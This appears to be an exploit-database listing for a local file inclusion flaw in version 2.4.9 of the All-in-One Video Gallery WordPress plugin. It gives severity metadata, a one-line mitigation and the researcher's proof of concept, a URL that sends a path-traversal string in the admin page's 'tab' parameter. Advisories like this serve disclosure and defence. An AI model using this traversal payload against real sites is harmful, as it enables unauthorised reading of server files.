header-logo
Suggest Exploit
vendor:
All-in-One Video Gallery plugin
by:
Mohamed Magdy Abumusilm Aka m19o
7.5
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: All-in-One Video Gallery plugin
Affected Version From: 2.4.2009
Affected Version To: 2.4.2009
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2020

WordPress Plugin All-in-One Video Gallery plugin 2.4.9 – Local File Inclusion (LFI)

Authenticated user can exploit LFI vulnerability in tab parameter.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI) 
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o 
# Software: All-in-One Video Gallery plugin 
# Version: <= 2.4.9
# Tested on: Windows,linux 

Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc

Decription : Authenticated user can exploit LFI vulnerability in tab parameter.

Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png

You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/

Navigation

Suggest Exploit

Services By CQR